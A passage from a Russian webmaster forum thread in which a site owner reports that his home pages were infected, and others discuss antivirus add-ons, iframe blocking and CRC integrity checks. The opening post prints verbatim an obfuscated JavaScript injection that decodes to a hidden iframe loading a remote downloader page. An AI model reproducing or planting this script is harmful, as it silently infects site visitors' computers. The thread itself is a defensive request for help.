Вирус на сайте.

aleks8897 · 2007-07-18T06:50:55.0000000Z

Сегодня утром по почте пришло сообщение с фрихоста на народе что якобы на на одном из моих сайтов (который я делал бог знает когда и собственно про него забыл) был отключен сайт по причине наличия вируса на нем. Начал смотреть через CuteFTP 7 Professional обнаружил на главных страницах (в коде) многих сайтов (не всех) вот такую вставку, причем на некоторых сайтах вместо всего кода стоит эта хрень, тобиж заменила своим кодом всю главную страницу, заражается только главная страница: <script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062'; s+='060073070082065077069032115114099061034104116116112058047047115105109111099114111103103101114046119'; s=s+'115047102108097115104047105110100101120046112104112034032119105100116104061053032104101105103104116'; s=s+'061053032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069062'; s=s+'032'; t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script>  хосты у меня на всех этих сайтах разные т.е. вариант что это на хостинге отметается. Значит через меня. На компе нод 32 лицензия стоит, и ничего... Перед тем как менять пароли и антивирь интересно узнать что эта хрень делает? Может кто сталкивался ? Да кстати вот письмо с фрихоста : Здравствуйте, Алексей! /index.htm : infected with Trojan.DownLoader.28150 Сейчас доступ к сайту по http закрыт, но доступ через мастерскую и по FTP возможен. Свяжитесь со службой поддержки Народ.Ру для выяснения/уточнения причины закрытия Вашего сайта. Просим Вас обратить внимание, что, если Вы не предприняли никаких действий по решению возникшей проблемы, закрытый сайт удаляется автоматически через месяц с момента закрытия и восстановлению не подлежит. С уважением, Служба поддержки Яндекса

264

Fat Bear

20 июля 2007, 14:56

#21

Kpd:
Существуют сервисы плановой он-лайн проверки сайтов (морд)?

Насчёт сервисов не знаю, как альтернатива, впрочем не стопроцентная, аддон к лисе, Dr.Web, который может проверить адрес не открывая его.

Открыть счёт в Capitalist ( https://capitalist.net/reg?from=e5707ff0c3 ). Виртуальные карты, USDT, банковские переводы, выплаты партнёрских программ. Push-партнёрка с высоким рейтом hClicks(https://hclicks.com/?ref=61dc0714).

1773

LEOnidUKG

20 июля 2007, 15:14

#22

Случаем никто программу не встречал, которая вырезает iframe? Кроме FireWall-ов?

Очень просто полезная функция... Был аутпост лицензионный, но синий экран как на 4,0 так и на 3,5 версиях меня достал просто...

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/

eTarget 2011:Панельная дискуссия «Стратегия eTarget 2011: Круглый стол Могут ли «плохие» входящие

113

profseo

20 июля 2007, 22:15

#23

Kpd:
Существуют сервисы плановой он-лайн проверки сайтов (морд)?

\

Не слыхал, самому аж стало интересно, существуют ли такие...народ, может кто-то встречал?Вещь полезная как ни как, лично мне бы не помешал такой сервис в избранном))...

Частное продвижение сайтов (по РФ, Украине), консультации и обучение, icq: 318-291-367, skype: profseoua

471

Lord Maverik

21 июля 2007, 00:02

#24

Тоже такая тема задолбала. Кстати сейчас стоит Каспер, вроде отлавливает все.

Так вот, настолько все достало, что сейчас пишу свою CMS. И сразу закладываю такую функцию, как самотестирование. Чтобы по крону скрипт пробегал по структуре сайта и сверял CRC. И в случая изменения незамедлительно сообщал.

Причем хочу все под zend поставить. Благо он почти на всех хостингах сейчас есть. Тогда в лоб уже код будет не исправить.

А насчет антивируса, браузера, фаера - все в приницпе обходится. и поэтому выбор инструментария смело можно основывать на личных препочтениях. IE так IE, лиса так лиса и т.д. Кстати вариант с виртуальной машиной весьма хорош. Но вот WebMoney (читал где-то, не уверен), вроде как под виртуальной машиной не пашет. Но это не так уже критично :)

RedMall.Ru (https://redmall.ru) - Товары из Китая (Таобао, Tmall) с проверкой качества, скидка для форумчан 7% Партнерская программа 2 уровня: 5% + 5%. Подробнее. (https://redmall.ru/about/partner/)

eTarget 2011:Панельная дискуссия «Стратегия eTarget 2011: Круглый стол Могут ли «плохие» входящие

302

antono

21 июля 2007, 06:23

#25

Lord Maverik:
Тоже такая тема задолбала. Кстати сейчас стоит Каспер, вроде отлавливает все.
Так вот, настолько все достало, что сейчас пишу свою CMS. И сразу закладываю такую функцию, как самотестирование. Чтобы по крону скрипт пробегал по структуре сайта и сверял CRC. И в случая изменения незамедлительно сообщал.
Причем хочу все под zend поставить. Благо он почти на всех хостингах сейчас есть. Тогда в лоб уже код будет не исправить.

У меня зазенденные файлы остались нетронутыми, все остальные на том же сервере заразились.

C

34

Chop

21 июля 2007, 11:10

#26

LEOnidUKG:
Случаем никто программу не встречал, которая вырезает iframe? Кроме FireWall-ов?
Очень просто полезная функция... Был аутпост лицензионный, но синий экран как на 4,0 так и на 3,5 версиях меня достал просто...

таких программ не встречал, но могу посоветовать использовать оперу, там в настройках можно отключить отображение iframe.

Жизнь в стиле SEO (http://www.seolivin.ru) Хостинг с человеческим лицом (http://ufa-host.ru) Ищу проекты на продвижение ()

67

Мэкс

21 июля 2007, 17:26

#27

Lord Maverik:
Чтобы по крону скрипт пробегал по структуре сайта и сверял CRC. И в случая изменения незамедлительно сообщал.

Проще и надежнее проверять CRC каждый раз при отдаче страницы. Если не тот - страницу не отображай а перекидывай на 404 или на главную.

Знание некоторых принципов легко возмещает незнание некоторых фактов. К. Гельвеций

В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах

Что делать, если ваша email-рассылка попала в спам